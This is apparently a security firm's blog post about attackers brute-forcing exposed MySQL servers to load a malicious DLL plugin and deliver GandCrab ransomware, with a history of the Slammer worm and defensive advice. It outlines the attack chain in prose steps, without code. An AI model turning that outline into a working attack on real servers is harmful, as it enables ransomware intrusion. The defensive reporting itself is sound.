Cybercriminals Target Another Legitimate Tool: MYSQL Servers

The recent discovery by researchers at Sophos that attackers are scanning the internet to find vulnerable MYSQL servers for the purpose of infecting them with the GandCrab ransomware shows that attackers are increasingly targeting legitimate tools as a means to sneak into organizations’ networks.

MySQL server is a database platform that uses tables to store data and indexes to sort data and speed up performance. This database platform supports desktop and web applications and runs on either Linux or Windows operating system. GandCrab ransomware, meanwhile, is a particular type of malicious software (malware) designed to lock out legitimate users from their computer system or data until a ransom is paid.

Researchers at Sophossaid that they set-up a mocked up insecure MySQL server for malicious hackers to find, probe and connect to. True enough, the researchers said, malicious actor or actors tried to connect to TCP port 3306, the default access port for MySQL and performed remote code execution on this exposed MySQL server. Remote code execution refers to the ability of an attacker to access someone else’s computing device and make changes to this device, no matter where this device is geographically located.

Researchers at Sophos said attackers turned exposed MySQL servers into remote code execution robots through the following process:

  1. Connect to a MySQL server directly accessible from the internet;
  2. Guess the username and password of an authorized user of the MySQL server and log in;
  3. Create an innocent-looking database table and add a text record made up of text, which in reality is actually a Windows executable file in hexadecimal;
  4. Decode the hexadecimal data and save it as a local file called “cna12.dll” (a DLL is a library that contains data and code that can be used by more than one program at the same time);
  5. Instruct the server to load the new DLL as a MySQL plugin known as a User Defined Function (UDF); and
  6. Call a function in the new plugin to retrieve and run the GandCrab ransomware using HTTP.

The researchers, however, noted that the observed attack wasn’t particularly sophisticated because the attackers fail to determine whether the mocked up MySQL server that the researchers set-up was running Linux or Windows operating system. The MySQL server attack observed by Sophos researchers only infects Windows-based version of MySQL.

As the mocked up insecure MySQL server set-up by Sophos researchers was running on Linux, it wasn’t infected by the GandCrab ransomware. If the mocked up server had been running Windows, the GandCrab ransomware would have been unleashed.

Past Vulnerabilities

SQL servers, in the past, had been the target by attackers. On January 25, 2003, the malware called “Slammer”, also known by other names such as Helkern, Sapphire and Warhol, wreaked havoc worldwide, causing internet blackouts in countries such as South Korea and the U.S. South Korea, one of the most interconnected countries in the world even at that time, suffered internet outage, while the banking operation in one of the banks in the U.S. was disrupted as ATMs were temporarily knocked offline.

SQL, which stands for structured query language, is a computer language used to communicate with a database. There are several database platforms that use SQL. Two of the most popular database platforms are Microsoft SQL server and MySQL server.

As the name suggests, Microsoft SQL server is a database platform developed by Microsoft and runs only on Windows operating systems. The first release of Microsoft SQL server was in 1989. MySQL server, on the other hand, is a database platform that is an open-source project that was first released in 1995. Compared to Microsoft SQL server that runs only on Windows operating systems, MySQL server runs in either Linux or Windows operating system.

Similar to the latest exploit discovered by Sophos researchers, the Slammer malware which wreaked havoc on January 25, 2003 scanned the internet for vulnerable machines. While the exploit discovered by Sophos researchers scanned the internet for vulnerable MySQL servers, the Slammer malware scanned the internet for vulnerable Microsoft SQL servers, specifically version 2000.

In the Slammer malware case, the vulnerable Microsoft SQL server version 2000 refers to the Microsoft SQL Server 2000 that didn’t apply the security update that fixes that security vulnerability exploited by Slammer, an update that was released by Microsoft months before the January 25, 2003 Slammer attack.

Slammer made a huge impact worldwide at the time due to its worm capability – the ability to spread itself within networks without user interaction. The Slammer worm spread itself to random IP addresses via Microsoft SQL port 1434.

The Slammer was spreading 255 times faster than any other worm at the time of the attack. This malware caused internet blackouts on a worldwide scale as Microsoft SQL servers were then often used on the web and once a Microsoft SQL server was infected with the Slammer worm, it tried to connect to other random Microsoft SQL servers in an endless loop – causing a global internet traffic overflow.

Cybersecurity Best Practices 

Exploiting the vulnerabilities in SQL servers is another attempt on the part of cybercriminals in exploiting legitimate tools of system administrators to sneak into organizations’ networks. Here are some cybersecurity best practices in order to prevent or mitigate this type of cyberattack:

Keep all software up-to-date

In the case of the Slammer attack, this could have been prevented by the timely application of the software’s (Microsoft SQL Server 2000) security update.

Ensure that SQL Servers Aren’t Accessible from the Internet

It’s recommended that SQL servers aren’t directly accessible from the internet. System administrators, however, may find it necessary for this to be accessible online. In such a case, it’s important that these internet-facing SQL servers should be accessed only using a VPN as the first point of entry and insist on using two-factor authentication (2FA) for all your users.

When you need help securing your infrastructure, our information security expertsare a phone call away. To learn more about how we can help, or for immediate assistance, call today (416) 920-3000or email us.

Leave a Reply

Your email address will not be published. Required fields are marked *